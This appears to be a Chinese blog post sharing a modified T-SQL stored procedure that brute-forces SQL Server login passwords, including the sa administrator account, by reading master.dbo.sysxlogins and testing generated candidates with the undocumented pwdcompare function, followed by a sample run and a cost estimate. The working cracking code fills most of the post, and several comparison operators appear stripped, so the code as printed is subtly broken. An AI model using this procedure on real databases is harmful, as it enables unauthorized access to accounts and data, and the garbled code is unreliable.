網(wǎng)上有SQL Server Sa密碼破解的存儲(chǔ)過(guò)程���,方法就是暴力破解MSSQL的帳號(hào)和密碼��,包括管理員帳號(hào)sa的密碼��,下面我對(duì)其它的代碼稍做修改��,并進(jìn)行了一些性能分析����。
首先說(shuō)說(shuō)破解過(guò)程序核心思想��,就是存儲(chǔ)帳號(hào)密碼的master.dbo.sysxlogins表和未公布的密碼比較存儲(chǔ)過(guò)程pwdcompare�。經(jīng)過(guò)一方分析,修改了部分代碼����,下面貼出修改前后的代碼,
alter proc p_GetPassword2
@username sysname=null, --用戶名,如果不指定,則列出所有用戶
@pwdlen int=2 --要破解的密碼的位數(shù),默認(rèn)是2位及以下的
as
set nocount on
if object_id(N'tempdb..#t') is not null
drop table #t
if object_id(N'tempdb..#pwd') is not null
drop table #pwd
set @pwdlen=case when isnull(@pwdlen,0)1 then 1 else @pwdlen-1 end
declare @ss varchar(256)
--select @ss= '123456789'
select @ss= 'abcdefghijklmnopqrstuvwxyz'
select @ss=@ss+ '`0123456789-=[]\;,./'
select @ss=@ss+ '~!@#$%^*()_+{}|:>?'
--select @ss=@ss+ 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
create table #t(c char(1) not null)
alter table #t add constraint PK_#t primary key CLUSTERED (c)
declare @index int
select @index=1
while (@index =len(@ss))
begin
insert #t select SUBSTRING(@ss, @index, 1)
select @index = @index +1
end
select name,password
,type=case when xstatus2048=2048 then 1 else 0 end
,jm=case when password is null then 1 else 0 end
,pwdstr=cast('' as sysname)
,pwd=cast('' as varchar(8000))
,times =cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)
declare @l int, @t bigint
select @t = count(1)*POWER(len(@ss),1) from #pwd
select @l=0
,@s1='aa.c'
,@s2='cast(ASCII(aa.c) as varchar)'
,@s3=',#t aa'
,@stimes='1th,' + cast(@t as varchar(20)) + 'rows'
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
while exists(select 1 from #pwd where jm=0 and @l@pwdlen)
begin
select @l=@l+1
select @t = count(1)*POWER(len(@ss),@l+1) from #pwd
print @t
select
@s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
,@stimes=@stimes+';'+ cast(@l+1 as varchar(1)) + 'th,' + cast(@t as varchar(20)) + 'rows'
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
,times='''+@stimes+'''
from #pwd pwd'+@s3+'
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
end
select 用戶名=name,密碼=pwdstr,密碼ASCII=pwd, 查詢次數(shù)和行數(shù)=times
from #pwd
if object_id(N'tempdb..#t') is not null
drop table #t
if object_id(N'tempdb..#pwd') is not null
drop table #pwd
p_GetPassword2 'b', 6
用戶名 密碼 密碼ASCII 查詢次數(shù)和行數(shù)
b 123 49,50,51 1th,66rows;2th,4356rows;3th,287496rows
本例以一個(gè)查詢能查詢bigint的最大值條記錄9223372036854775807為限做為主機(jī)最大性能�����,來(lái)粗略計(jì)算破解性能。
破解一個(gè)帳號(hào)的密碼長(zhǎng)度���,破解時(shí)間和性能消耗��,是以所有用于破解的字符長(zhǎng)度為底��,以密碼長(zhǎng)度為指數(shù)的指數(shù)函數(shù)���,即:破解帳號(hào)個(gè)數(shù) * (所有用于破解的字符個(gè)數(shù))最長(zhǎng)密碼長(zhǎng)度次方 主機(jī)最大性能:
